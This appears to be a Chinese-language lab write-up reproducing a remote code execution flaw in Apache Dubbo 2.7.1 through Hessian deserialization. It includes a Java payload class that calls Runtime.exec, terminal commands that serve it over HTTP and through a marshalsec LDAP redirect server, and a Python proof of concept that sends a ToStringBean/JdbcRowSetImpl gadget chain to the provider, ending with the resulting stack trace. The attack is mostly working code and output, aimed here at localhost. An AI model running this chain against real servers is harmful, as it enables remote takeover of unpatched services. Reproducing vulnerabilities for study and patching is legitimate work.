git clone https://github.com/apache/dubbo-spring-boot-project
cd dubbo-spring-boot-project
git checkout 2.7.1 -b b2.7.1
# 将整个项目dubbo-spring-boot-project导入IDEA
在dubbo-spring-boot-samples/auto-configure-samples/provider-sample/pom.xml
引入以下依赖:
<dependency>
<groupId>com.rometools</groupId>
<artifactId>rome</artifactId>
<version>1.7.0</version>
</dependency>
修改默认端口:dubbo-spring-boot-samples/auto-configure-samples/provider-sample/src/main/resources/application.properties
为12347
ExploitMac.java
public class ExploitMac{public ExploitMac(){try{java.lang.Runtime.getRuntime().exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator");}catch(java.io.IOException e){e.printStackTrace();}}}
terminal 1
[~/Downloads]$ cat ExploitMac.java [23:55:12]
public class ExploitMac{public ExploitMac(){try{java.lang.Runtime.getRuntime().exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator");}catch(java.io.IOException e){e.printStackTrace();}}}
[~/Downloads]$ vi ExploitMac.java [23:43:04]
[~/Downloads]$ javac ExploitMac.java [23:43:17]
[~/Downloads]$ python3 -m http.server 8088 [23:43:19]
zsh: correct 'http.server' to 'httpserver' [nyae]? n
Serving HTTP on 0.0.0.0 port 8088 (http://0.0.0.0:8088/) ...
127.0.0.1 - - [23/Jun/2020 23:49:27] "GET /ExploitMac.class HTTP/1.1" 200 -
terminal 2
[master][~/GitProjects/marshalsec]$ java -cp ./target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:8088/#ExploitMac 8087
Listening on 0.0.0.0:8087
Send LDAP reference result for ExploitMac redirecting to http://127.0.0.1:8088/ExploitMac.class
terminal 3
$ python3 -m pip install dubbo-py
$ python3 dubbo3.py
PoC
from dubbo.codec.hessian2 import Decoder,new_object
from dubbo.client import DubboClient
client = DubboClient('127.0.0.1', 12347)
JdbcRowSetImpl=new_object(
'com.sun.rowset.JdbcRowSetImpl',
dataSource="ldap://127.0.0.1:8087/ExploitMac",
strMatchColumns=["foo"]
)
JdbcRowSetImplClass=new_object(
'java.lang.Class',
name="com.sun.rowset.JdbcRowSetImpl",
)
toStringBean=new_object(
'com.rometools.rome.feed.impl.ToStringBean',
beanClass=JdbcRowSetImplClass,
obj=JdbcRowSetImpl
)
resp = client.send_request_and_return_response(
service_name='org.apache.dubbo.spring.boot.demo.consumer.DemoService',
method_name='rce',
args=[toStringBean])
IDEA报错
2020-06-23 23:49:27.073 ERROR 66497 --- [12347-thread-17] c.rometools.rome.feed.impl.ToStringBean : Error while generating toString
java.lang.reflect.InvocationTargetException: null
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) ~[na:1.8.0_131]
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62) ~[na:1.8.0_131]
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) ~[na:1.8.0_131]
at java.lang.reflect.Method.invoke(Method.java:498) ~[na:1.8.0_131]
at com.rometools.rome.feed.impl.ToStringBean.toString(ToStringBean.java:158) [rome-1.7.0.jar:1.7.0]
at com.rometools.rome.feed.impl.ToStringBean.toString(ToStringBean.java:129) [rome-1.7.0.jar:1.7.0]
at java.lang.String.valueOf(String.java:2994) [na:1.8.0_131]
at java.util.Arrays.toString(Arrays.java:4571) [na:1.8.0_131]
at org.apache.dubbo.rpc.RpcInvocation.toString(RpcInvocation.java:211) [dubbo-2.7.1.jar:2.7.1]
at java.lang.String.valueOf(String.java:2994) [na:1.8.0_131]
at java.lang.StringBuilder.append(StringBuilder.java:131) [na:1.8.0_131]
at org.apache.dubbo.rpc.protocol.dubbo.DubboProtocol.getInvoker(DubboProtocol.java:248) [dubbo-2.7.1.jar:2.7.1]
at org.apache.dubbo.rpc.protocol.dubbo.DubboProtocol$1.reply(DubboProtocol.java:102) [dubbo-2.7.1.jar:2.7.1]
at org.apache.dubbo.remoting.exchange.support.header.HeaderExchangeHandler.handleRequest(HeaderExchangeHandler.java:103) [dubbo-2.7.1.jar:2.7.1]
at org.apache.dubbo.remoting.exchange.support.header.HeaderExchangeHandler.received(HeaderExchangeHandler.java:200) [dubbo-2.7.1.jar:2.7.1]
at org.apache.dubbo.remoting.transport.DecodeHandler.received(DecodeHandler.java:51) [dubbo-2.7.1.jar:2.7.1]
at org.apache.dubbo.remoting.transport.dispatcher.ChannelEventRunnable.run(ChannelEventRunnable.java:57) [dubbo-2.7.1.jar:2.7.1]
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142) [na:1.8.0_131]
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617) [na:1.8.0_131]
at java.lang.Thread.run(Thread.java:748) [na:1.8.0_131]
Caused by: java.sql.SQLException: JdbcRowSet (连接) JNDI 无法连接
at com.sun.rowset.JdbcRowSetImpl.connect(JdbcRowSetImpl.java:634) ~[na:1.8.0_131]
at com.sun.rowset.JdbcRowSetImpl.getDatabaseMetaData(JdbcRowSetImpl.java:4004) ~[na:1.8.0_131]
... 20 common frames omitted
Wireshak:8087
Wireshak:12347
Demo
参考
- https://mp.weixin.qq.com/s/iKQbdWrMG00Arg0aEUbrXQ
- https://www.mail-archive.com/dev@dubbo.apache.org/msg06544.html